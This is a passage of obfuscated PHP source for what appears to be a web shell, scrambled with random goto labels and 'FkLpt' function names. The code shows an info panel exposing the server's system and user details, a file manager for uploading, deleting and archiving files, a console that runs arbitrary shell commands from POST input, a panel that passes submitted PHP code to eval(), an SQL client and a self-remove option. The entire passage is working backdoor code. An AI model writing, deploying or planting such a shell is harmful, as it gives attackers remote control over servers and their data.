$GLOBALS['default_charset']; } goto b8afb; eed73: D8ecd: goto ab364; F754a: $j = 0; goto Bd90c; E0dbd: goto c2d57; goto cce16; cce16: D6fbe: goto Be5ea; c5b12: $totalSpace = $totalSpace ? $totalSpace : 1; goto Cb076; B0939: $m['Self remove'] = 'SelfRemove'; goto bde80; b3ca9: c2d57: goto D6f65; Cb076: $release = @php_uname('r'); goto e609e; C55f6: echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . FkLptViewSize($totalSpace) . ' <span>Free:</span> ' . FkLptViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . FkLptPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; goto Baee5; Dd7f1: $explink = ''; goto b3053; eab26: if (!($j <= $i)) { goto d06ab; } goto a8900; da3cc: $freeSpace = @diskfreespace($GLOBALS['cwd']); goto c1f5a; e28ae: $i = 0; goto b3ca9; E3a0d: if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } Caab1: } E4d7a: } goto C55f6; bde80: $menu = ''; goto e0070; ccdbe: d06ab: goto B0574; Bcbdf: b9c36: goto D2804; D2804: $j++; goto D27be; a3739: $opt_charsets = ''; goto E8897; e3f8d: c1ce0: goto ce6f4; D93e5: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: {$color} !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\r\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\r\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\r\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\r\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\r\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t\t//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>"; goto da3cc; B0574: $cwd_links .= "\")'>" . $path[$i] . "/</a>"; goto fa892; e609e: $kernel = @php_uname('s'); goto Dd7f1; D6f65: if (!($i < $n - 1)) { goto D6fbe; } goto a3a67; a8900: $cwd_links .= $path[$j] . '/'; goto Bcbdf; c8bcc: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto B0939; fa892: B2b02: goto B527b; ce6f4: $drives = ""; goto E3a0d; E8897: foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; A3913: } goto eed73; c1f5a: $totalSpace = @disk_total_space($GLOBALS['cwd']); goto c5b12; fd387: if (!function_exists('posix_getegid')) { goto Bc41e; Af604: $gid = @getmygid(); goto Dc3d9; Dc3d9: $group = "?"; goto eb5e6; e6bb4: $uid = @getmyuid(); goto Af604; Bc41e: $user = @get_current_user(); goto e6bb4; eb5e6: } else { goto E0f9e; E0f9e: $uid = @posix_getpwuid(posix_geteuid()); goto B213a; F387b: $gid = $gid['gid']; goto D44a6; B213a: $gid = @posix_getgrgid(posix_getegid()); goto c34ea; bef8f: $uid = $uid['uid']; goto Adab4; Adab4: $group = $gid['name']; goto F387b; c34ea: $user = $uid['name']; goto bef8f; D44a6: } goto d247f; Baee5: } goto A7ba2; aef2c: function actionFilesMan() { goto E9bde; ff42a: if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'dir')); } goto Dfc2f; Dfc2f: e11b3: goto A1caa; B673b: if (!($i < $n)) { goto Acf97; } goto d44ce; e3959: if (!empty($_POST['p1'])) { goto c6d98; B4a46: bb6af: goto eff84; c6d98: switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } goto D5709; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } goto D5709; case 'delete': goto B5d87; d7201: if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto C3e0e; C3e0e: if ($f == '..') { goto c0e52; } goto eed01; eed01: $f = urldecode($f); goto Deccb; bdd30: c0e52: goto ea677; Deccb: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto bdd30; ea677: } E62f9: } goto Adfc6; Adfc6: goto D5709; goto fd58e; B5d87: function deleteDir($path) { goto bf9bb; e8a19: goto F37a1; goto f1ba7; cc79a: $dh = opendir($path); goto Fb663; f1ba7: ce291: goto b1d40; Ef1fa: $type = filetype($item); goto b15f6; Fb663: F37a1: goto Ed70f; Ed70f: if (!(($item = readdir($dh)) !== false)) { goto ce291; } goto fe16c; bf9bb: $path = substr($path, -1) == '/' ? $path : $path . '/'; goto cc79a; d9045: if (basename($item) == ".." || basename($item) == ".") { goto F37a1; } goto Ef1fa; fe16c: $item = $path . $item; goto d9045; d782e: @rmdir($path); goto e3301; b15f6: if ($type == "dir") { deleteDir($item); } else { @unlink($item); } goto e8a19; b1d40: closedir($dh); goto d782e; e3301: } goto d7201; fd58e: case 'paste': goto e4669; e4669: if ($_COOKIE['act'] == 'copy') { goto Ba89b; Ba89b: function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto be7bb; a85ac: Edfff: goto Ff25f; Fce4f: Fa556: goto Df1a7; be7bb: mkdir($d . $s); goto a6801; febde: goto Fa556; goto a85ac; Df1a7: if (!(($f = @readdir($h)) !== false)) { goto Edfff; } goto fd1e6; fd1e6: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto febde; a6801: $h = @opendir($c . $s); goto Fce4f; Ff25f: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto Dfb8b; c1910: Db6e5: goto Efe9a; Dfb8b: foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); Ac2d0: } goto c1910; Efe9a: } elseif ($_COOKIE['act'] == 'move') { goto ebf48; A1019: Bcfe4: goto C795b; Bed27: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); Dfc46: } goto A1019; ebf48: function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto D2501; C238f: if (!(($f = @readdir($h)) !== false)) { goto B06a4; } goto D9a7d; bce80: B06a4: goto Dede3; bcd0c: goto A4f27; goto bce80; D2501: mkdir($d . $s); goto c8979; c8979: $h = @opendir($c . $s); goto fd650; D9a7d: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto bcd0c; fd650: A4f27: goto C238f; Dede3: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto Bed27; C795b: } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto c6be4; c6be4: chdir($_COOKIE['c']); goto C363e; Ff134: chdir($GLOBALS['cwd']); goto F8070; A060b: bc3be: goto Ff134; C363e: foreach ($_COOKIE['f'] as $f) { goto d0815; d0815: if ($f == '..') { goto c294a; } goto e962f; Aebbc: c294a: goto dc42f; e962f: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { goto C93bb; C93bb: $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto C422f; C1dfa: Ed48d: goto b9570; C422f: foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); ee0cf: } goto C1dfa; b9570: } goto Aebbc; dc42f: } goto A060b; F8070: $zip->close(); goto faa2c; faa2c: } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { goto B7c9f; de2e3: E5b84: goto c8431; B7c9f: $zip = new ZipArchive(); goto D94e6; D94e6: foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } d7742: } goto de2e3; c8431: } } elseif ($_COOKIE['act'] == 'tar') { goto a94e9; b4bb6: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto f0675; d4cc0: chdir($GLOBALS['cwd']); goto d2d87; f0675: FkLptEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); goto d4cc0; a94e9: chdir($_COOKIE['c']); goto b4bb6; d2d87: } goto a00eb; C67ee: setcookie('f', '', time() - 3600); goto a1f11; a1f11: goto D5709; goto a6351; a00eb: unset($_COOKIE['f']); goto C67ee; a6351: default: if (!empty($_POST['p1'])) { goto eefd5; eefd5: FkLptsetcookie('act', $_POST['p1']); goto f8d07; f8d07: FkLptsetcookie('f', serialize(@$_POST['f'])); goto e0cf5; e0cf5: FkLptsetcookie('c', @$_POST['c']); goto Fa036; Fa036: } goto D5709; } goto B4a46; eff84: D5709: goto B58c4; B58c4: } goto c74b1; A536a: $n = count($dirContent); goto b2513; Cb320: foreach ($files as $f) { goto afb76; B3a79: B21a9: goto d9590; afb76: echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? FkLptViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; goto ec2d2; ec2d2: $l = $l ? 0 : 1; goto B3a79; d9590: } goto b97cd; Cebe2: global $sort; goto f5d6f; Cb602: b3860: goto B673b; A4fa3: echo "<option value='tar'>Compress (tar.gz)</option>"; goto a1803; F3e31: if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } goto Da9a2; E9bde: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto e3959; dc073: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => FkLptPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); goto ff42a; F80ec: FkLptFooter(); goto b49e8; E67fc: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto F80ec; B4acd: echo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>\r\n\t<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto ddc57; a5807: usort($files, "FkLptCmp"); goto A3d8b; c74b1: FkLptHeader(); goto c144c; c144c: echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; goto Ad15e; cdc91: $dirs = $files = array(); goto A536a; b97cd: B560d: goto B4acd; d44ce: $ow = @posix_getpwuid(@fileowner($dirContent[$i])); goto e5f9e; Eb523: function FkLptCmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } goto a5807; f47e7: $GLOBALS['sort'] = $sort; goto Eb523; D1f28: if ($dirContent === false) { goto E16b0; E16b0: echo 'Can\'t open this folder!'; goto E5f7d; efdc8: return; goto C6277; E5f7d: FkLptFooter(); goto efdc8; C6277: } goto Cebe2; f90ea: goto b3860; goto Ebc1a; Ebc1a: Acf97: goto f47e7; f5d6f: $sort = array('name', 1); goto F3e31; A3d8b: usort($dirs, "FkLptCmp"); goto b00dc; b00dc: $files = array_merge($dirs, $files); goto e319b; b2513: $i = 0; goto Cb602; e5f9e: $gr = @posix_getgrgid(@filegroup($dirContent[$i])); goto dc073; C661f: echo "</select> "; goto E6a56; Ad15e: $dirContent = FkLptScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); goto D1f28; a1803: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>Paste / Compress</option>"; } goto C661f; ddc57: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>"; } goto A4fa3; Da9a2: echo "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; goto cdc91; A1caa: $i++; goto f90ea; E6a56: if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo "file name: <input type=text name=p2 value='FkLpt_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> "; } goto E67fc; e319b: $l = 0; goto Cb320; b49e8: } goto F16f6; e796f: function actionConsole() { goto Bff45; F0df6: if (!empty($_POST['p1'])) { echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . FkLptEx($_POST['p1'])); } goto e82ad; cf964: if (isset($_POST['ajax'])) { goto e99c2; f6b9f: $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . FkLptEx($_POST['p1']), "\n\r\t\\'\0")); goto E93f6; de990: $temp = ob_get_clean(); goto C479a; Bc17b: echo "d.cf.output.value+='" . $temp . "';"; goto a53c8; f0885: exit; goto d4df2; E93f6: if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) { if (@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto Bc17b; a53c8: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto de990; e99c2: FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto afb4c; cba00: echo "d.cf.cmd.value='';\n"; goto f6b9f; C479a: echo strlen($temp), "\n", $temp; goto f0885; afb4c: ob_start(); goto cba00; d4df2: } goto f53c5; f53c5: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto a8d7c; e43fe: foreach ($GLOBALS['aliases'] as $n => $v) { goto e6e83; Acc26: A8280: goto a6fe4; c79fd: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto Acc26; e6e83: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto A8280; } goto c79fd; a6fe4: } goto C9e4f; e82ad: echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; goto Deb9d; a8d7c: FkLptHeader(); goto eece5; cb634: FkLptFooter(); goto D5165; a0416: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; goto e43fe; C9e4f: a9897: goto bea91; bea91: echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; goto F0df6; eece5: echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array('');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push('');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>"; goto a0416; Bff45: if (!empty($_POST['p1']) && !empty($_POST['p2'])) { FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif (!empty($_POST['p1'])) { FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0); } goto cf964; Deb9d: echo '</form></div><script>d.cf.cmd.focus();</script>'; goto cb634; D5165: } goto ffc94; dd88c: function FkLptsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto E9488; fce78: if (get_magic_quotes_gpc()) { goto F5d5b; E338f: $_POST = FkLptstripslashes($_POST); goto E3991; E3991: $_COOKIE = FkLptstripslashes($_COOKIE); goto e09ca; F5d5b: function FkLptstripslashes($array) { return is_array($array) ? array_map('FkLptstripslashes', $array) : stripslashes($array); } goto E338f; e09ca: } goto b450d; c9ec8: if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function posix_getgrgid($p) { return false; } } goto cd19b; C0eb9: if ($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } goto fbe90; af6f9: $default_use_ajax = true; goto ea746; Fb269: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { call_user_func('action' . $_POST['a']); } goto b31e6; f5d69: function actionPhp() { goto e9e4f; dce98: FkLptHeader(); goto ba47c; e9e4f: if (isset($_POST['ajax'])) { goto C8a87; b2b8e: exit; goto Fa048; C8a87: FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto F297c; Ff232: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto ada95; ada95: echo strlen($temp), "\n", $temp; goto b2b8e; A9c85: eval($_POST['p1']); goto Ff232; F297c: ob_start(); goto A9c85; Fa048: } goto C665b; Dd0e8: echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>'; goto d5706; b0eb2: echo '</pre></div>'; goto Af62a; C665b: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { FkLptsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto dce98; E5bdf: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">'; goto Dd0e8; d5706: if (!empty($_POST['p1'])) { goto Cd190; Cd190: ob_start(); goto Da045; ca994: echo htmlspecialchars(ob_get_clean()); goto dd6eb; Da045: eval($_POST['p1']); goto ca994; dd6eb: } goto b0eb2; ba47c: if (isset($_POST['p2']) && $_POST['p2'] == 'info') { goto Cbde5; Cbde5: echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; goto e6ce6; Bef09: phpinfo(); goto F1bf5; C51f7: $tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp); goto dd966; e6ce6: ob_start(); goto Bef09; dd966: echo str_replace('<h1', '<h2', $tmp) . '</div><br>'; goto b097d; F1bf5: $tmp = ob_get_clean(); goto C51f7; b097d: } goto E5bdf; Af62a: FkLptFooter(); goto Fd1ca; Fd1ca: } goto aef2c; ffc94: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } goto b9a1d; dd63f: function actionSql() { goto Ced81; F933c: FkLptFooter(); goto Daa52; Ff4b1: echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>"; goto d2922; Ba1e2: $db = new DbClass($_POST['type']); goto c65e2; e3ef9: if (@$_POST['type'] == 'pgsql') { echo 'selected'; } goto E748f; Eae9d: if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { goto B8f49; d2fc5: if (!($item = $db->fetch())) { goto A080e; 